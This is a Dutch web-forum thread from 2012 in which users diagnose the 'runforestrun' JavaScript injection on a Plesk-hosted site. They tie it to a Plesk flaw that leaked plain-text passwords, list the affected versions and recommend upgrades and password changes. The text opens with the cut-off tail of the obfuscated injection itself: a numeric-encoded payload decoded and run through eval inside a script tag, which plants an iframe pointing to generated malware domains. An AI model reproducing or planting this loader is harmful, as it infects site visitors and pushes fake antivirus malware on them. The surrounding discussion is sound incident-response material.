53,53,48,44,54,48,54,44,53,48,48,44,50,48,52,44,50,48,53,44,55,51,56,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,51,48,44,53,49,48,44,54,56,52,44,52,56,53,44,54,53,52,44,53,48,53,44,53,50,50,44,52,56,53,44,54,57,48,44,51,51,53,44,54,56,52,44,53,48,53,44,53,56,50,44,53,56,48,44,54,48,54,44,53,48,48,44,49,57,50,44,51,48,53,44,49,57,50,44,53,56,48,44,54,56,52,44,53,56,53,44,54,48,54,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,57,48,44,53,56,50,44,53,55,48,44,49,57,50,44,53,56,53,44,54,54,48,44,53,50,53,44,55,50,48,44,49,54,48,44,51,54,54,44,49,54,48,44,52,54,50,44,52,56,53,44,54,57,54,44,53,50,48,44,50,55,54,44,53,55,48,44,54,54,54,44,53,56,53,44,54,54,48,44,53,48,48,44,50,52,48,44,50,49,53,44,54,54,48,44,53,48,53,44,55,49,52,44,49,54,48,44,52,48,56,44,52,56,53,44,54,57,54,44,53,48,53,44,50,52,48,44,50,48,53,44,50,56,50,44,50,52,53,44,50,56,56,44,50,52,48,44,50,56,56,44,50,48,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,48,56,44,52,56,53,44,54,56,52,44,49,54,48,44,54,48,48,44,53,53,53,44,54,53,52,44,52,56,53,44,54,51,48,44,53,53,48,44,52,54,56,44,52,56,53,44,54,53,52,44,53,48,53,44,49,57,50,44,51,48,53,44,49,57,50,44,53,49,53,44,54,48,54,44,53,53,48,44,54,48,54,44,53,55,48,44,53,56,50,44,53,56,48,44,54,48,54,44,52,48,48,44,54,57,48,44,53,48,53,44,55,48,50,44,53,48,48,44,54,54,54,44,52,49,48,44,53,56,50,44,53,53,48,44,54,48,48,44,53,53,53,44,54,53,52,44,52,49,53,44,54,57,54,44,53,55,48,44,54,51,48,44,53,53,48,44,54,49,56,44,50,48,48,44,55,48,50,44,53,53,48,44,54,51,48,44,54,48,48,44,50,54,52,44,49,54,48,44,50,57,52,44,50,55,48,44,50,54,52,44,49,54,48,44,50,51,52,44,53,55,48,44,55,48,50,44,49,57,53,44,50,52,54,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,50,53,44,54,49,50,44,53,55,48,44,54,53,52,44,49,54,48,44,51,54,54,44,49,54,48,44,54,48,48,44,53,53,53,44,53,57,52,44,53,56,53,44,54,53,52,44,53,48,53,44,54,54,48,44,53,56,48,44,50,55,54,44,52,57,53,44,54,56,52,44,53,48,53,44,53,56,50,44,53,56,48,44,54,48,54,44,51,52,53,44,54,52,56,44,53,48,53,44,54,53,52,44,53,48,53,44,54,54,48,44,53,56,48,44,50,52,48,44,49,55,48,44,52,51,56,44,51,53,48,44,52,57,50,44,51,50,53,44,52,54,50,44,51,52,53,44,50,48,52,44,50,48,53,44,51,53,52,44,49,54,48,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,50,53,44,54,49,50,44,53,55,48,44,54,53,52,44,50,51,48,44,54,57,48,44,53,48,53,44,54,57,54,44,51,50,53,44,54,57,54,44,53,56,48,44,54,56,52,44,53,50,53,44,53,56,56,44,53,56,53,44,54,57,54,44,53,48,53,44,50,52,48,44,49,55,48,44,54,57,48,44,53,55,48,44,53,57,52,44,49,55,48,44,50,54,52,44,49,54,48,44,50,48,52,44,53,50,48,44,54,57,54,44,53,56,48,44,54,55,50,44,50,57,48,44,50,56,50,44,50,51,53,44,50,48,52,44,50,49,53,44,54,48,48,44,53,53,53,44,54,53,52,44,52,56,53,44,54,51,48,44,53,53,48,44,52,54,56,44,52,56,53,44,54,53,52,44,53,48,53,44,50,53,56,44,49,55,48,44,50,56,50,44,53,55,48,44,55,48,50,44,53,53,48,44,54,49,50,44,53,53,53,44,54,56,52,44,53,48,53,44,54,57,48,44,53,56,48,44,54,56,52,44,53,56,53,44,54,54,48,44,51,49,53,44,54,57,48,44,53,50,53,44,54,48,48,44,51,48,53,44,53,56,56,44,53,53,53,44,54,57,54,44,53,53,48,44,54,48,54,44,53,56,48,44,51,48,48,44,49,55,48,44,50,52,54,44,50,57,53,44,49,57,50,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,51,48,44,53,49,48,44,54,56,52,44,53,52,53,44,50,55,54,44,53,55,53,44,54,57,54,44,54,48,53,44,54,52,56,44,53,48,53,44,50,55,54,44,53,57,53,44,54,51,48,44,53,48,48,44,54,57,54,44,53,50,48,44,49,57,50,44,51,48,53,44,49,57,50,44,49,55,48,44,50,56,56,44,53,54,48,44,55,50,48,44,49,55,48,44,51,53,52,44,49,54,48,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,50,53,44,54,49,50,44,53,55,48,44,54,53,52,44,50,51,48,44,54,57,48,44,53,56,48,44,55,50,54,44,53,52,48,44,54,48,54,44,50,51,48,44,54,50,52,44,53,48,53,44,54,51,48,44,53,49,53,44,54,50,52,44,53,56,48,44,49,57,50,44,51,48,53,44,49,57,50,44,49,55,48,44,50,56,56,44,53,54,48,44,55,50,48,44,49,55,48,44,51,53,52,44,49,54,48,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,50,53,44,54,49,50,44,53,55,48,44,54,53,52,44,50,51,48,44,54,57,48,44,53,56,48,44,55,50,54,44,53,52,48,44,54,48,54,44,50,51,48,44,55,48,56,44,53,50,53,44,54,57,48,44,53,50,53,44,53,56,56,44,53,50,53,44,54,52,56,44,53,50,53,44,54,57,54,44,54,48,53,44,49,57,50,44,51,48,53,44,49,57,50,44,49,55,48,44,54,50,52,44,53,50,53,44,54,48,48,44,53,48,48,44,54,48,54,44,53,53,48,44,50,48,52,44,50,57,53,44,49,57,50,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,48,48,44,53,53,53,44,53,57,52,44,53,56,53,44,54,53,52,44,53,48,53,44,54,54,48,44,53,56,48,44,50,55,54,44,52,57,48,44,54,54,54,44,53,48,48,44,55,50,54,44,50,51,48,44,53,56,50,44,53,54,48,44,54,55,50,44,53,48,53,44,54,54,48,44,53,48,48,44,52,48,50,44,53,50,48,44,54,51,48,44,53,52,48,44,54,48,48,44,50,48,48,44,54,51,48,44,53,49,48,44,54,56,52,44,53,52,53,44,50,52,54,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,54,50,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,54,50,53,44,53,57,52,44,52,56,53,44,54,57,54,44,52,57,53,44,54,50,52,44,50,48,48,44,54,48,54,44,50,48,53,44,55,51,56,44,54,50,53,44,54,48,44,54,50,53,44,50,54,52,44,49,54,48,44,51,49,56,44,50,52,48,44,50,56,56,44,50,48,53,44,51,53,52,93,59,118,61,34,101,118,97,34,59,125,105,102,40,118,41,101,61,119,105,110,100,111,119,91,118,43,34,108,34,93,59,119,61,102,59,115,61,91,93,59,114,61,83,116,114,105,110,103,59,122,61,40,40,101,41,63,34,67,111,100,101,34,58,34,34,41,59,102,111,114,40,59,49,55,55,54,45,53,43,53,62,105,59,105,43,61,49,41,123,106,61,105,59,105,102,40,101,41,115,61,115,43,114,91,102,114,43,40,40,101,41,63,34,67,111,100,101,34,58,49,50,41,93,40,40,119,91,106,93,47,40,53,43,101,40,34,106,37,50,34,41,41,41,41,59,125,10,105,102,40,102,41,101,40,115,41,59,125,10));/*qhk6sa6g1c*/</script>
 
PHP hulp

PHP hulp

26/04/2024 14:15:15
 
Q S

Q S

09/07/2012 09:44:51
Quote Anchor link
Ik heb m vorige week ook gehad die website draait op een server die te beheren is met Plesk. Blijkt dat daar een lek in de Filemanager zit.
 
John Cena

John Cena

09/07/2012 09:52:58
Quote Anchor link
Klopt, daar draait Plesk op. Hoe is dat nu tegen te gaan? En, hebben ze nu bij alle wachtwoorden kunnen kijken van API's etc?
 
De VeeWee

de VeeWee

09/07/2012 09:54:24
Quote Anchor link
Dat script zet een iframe op uw website met als link:
http://wakvnkyzkyietkdr.ru/runforestrun?sid=botnet2

Deze domeinnaam is random gegenereeerd door het script en zal dus bij een nslookup dikwijls geen record opleveren, omdat de domeinnaam bijvoorbeeld nog niet geregistreerd is.

Als je die javascript string gewoon output, krijg je dus die runforestrun injectie met een pseudo-random domain. Meer info hier over op:
http://blog.unmaskparasites.com/2012/06/22/runforestrun-and-pseudo-random-domains/

Als je dan naar de comments gaat kijken, dan zie je dat dat inderdaad in Plesk een fout is.

Quote:
To webmasters: If your site is affected by this hack, contact your hosting provider ASAP and show them this post. Change your account passwords. And if your host resets your passwords there is a good reason for that. Don’t change your passwords back to your old ones!


Vooral dit is interessant:
Quote:
Many admins do not realize that their passwords have been spied out weeks or months ago. To make it more clear: Due to the Plesk vulnerability database tables could be read. And unfortunately all Passwords in Plesk are stored in plain text!! Take a look in database ‘psa‘ at table ‘accounts‘ (and better sit down before doing that!). That’s why it is so important to change ALL passwords.


De hacker is dus met al de plain-text wachtwoorden gaan lopen.
Best plex upgraden zodat deze bug niet meer mogelijk is, of uw hosting firma contacteren om dit te doen.
 
John Cena

John Cena

09/07/2012 10:01:00
Quote Anchor link
Hmm, zal mijn hoster dit laten weten.

Is het mogelijk dat de hackz0rs met alle wachtwoorden zijn gaan lopen van API's, databases etc?
 
De VeeWee

de VeeWee

09/07/2012 10:07:27
Quote Anchor link
Volgens wat ik hier over gelezen heb, is dit een fout in plesk. Dit wilt zeggen dat ze dus van alle accounts in plesk de gegevens hebben. Dus van alle websites, managers, ...

Het zou over een sql injection gaan. Normaal worden de mysql wachtwoorden apart opgeslagen. Ik denk dus niet dat ze aan de database van uw website zelf geraken.

Vanaf het moment dat die plesk installatie gekraakt is, hebben ze alle wachtwoorden. Daarna wordt die js geinjecteerd in alle pagina's. Die zorgt er voor dat gebruikers een valse versie van bijvoorbeeld AV wordt aangeboden.

Ik lees echter niets over het bemachtigen van databases van de websites zelf.

Nog meer info over die runforestrun:
https://isc.sans.edu/diary/Run+Forest+Update+/13561

Misschien toch best op zeker spelen en deze wijzigen?
Gewijzigd op 09/07/2012 10:09:10 door de VeeWee
 
John Cena

John Cena

09/07/2012 10:12:16
Quote Anchor link
Wachtwoorden van SQL staan in een bestand op de server zelf, daar zijn ze dan waarschijnlijk ook bij geweest?
 
Elwin - Fratsloos

Elwin - Fratsloos

09/07/2012 10:16:42
Quote Anchor link
Over welke versie van Plesk gaat dit?
 
De VeeWee

de VeeWee

09/07/2012 10:19:30
Quote Anchor link
http://kb.parallels.com/en/113321:

Plesk 7.5.x Reloaded
Plesk 7.1.x Reloaded
Plesk 7.0.x
Parallels Plesk Panel 9.x for Linux/Unix
Parallels Plesk Panel 8.x for Linux/Unix
Plesk 7.x for Windows
Parallels Plesk Panel 9.x for Windows
Parallels Plesk Panel 8.x for Windows
Parallels Plesk Panel 10.3 for Windows
Parallels Plesk Panel 10.2 for Windows
Parallels Plesk Panel 10.1 for Windows
Parallels Plesk Panel 10.0.x for Windows
Parallels Plesk Panel 10.3 for Linux/Unix
Parallels Plesk Panel 10.2 for Linux/Unix
Parallels Plesk Panel 10.1 for Linux/Unix
Parallels Plesk Panel 10.0.x for Linux/Unix

Volgens mij zijn ze niet naar die mysql op zoek gegaan. Het is natuurlijk mogelijk.
Het zou over de plesk gebruikers/websites gaan en hun ftp records.
Misschien kan je deze toch best aanpassen om zeker te zijn?
 
Elwin - Fratsloos

Elwin - Fratsloos

09/07/2012 10:32:04
Quote Anchor link
Thx voor de link. :)
Vannacht met een van de servers naar 10.4.4 geüpgrade. De anderen toch ook maar z.s.m. :)
 
De VeeWee

de VeeWee

09/07/2012 10:34:05
Quote Anchor link
In versie 11, die nog maar net uit is, staan de wachtwoorden eindelijk geëncrypteerd. Misschien even overwegen om direct naar de 11 te upgraden?
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.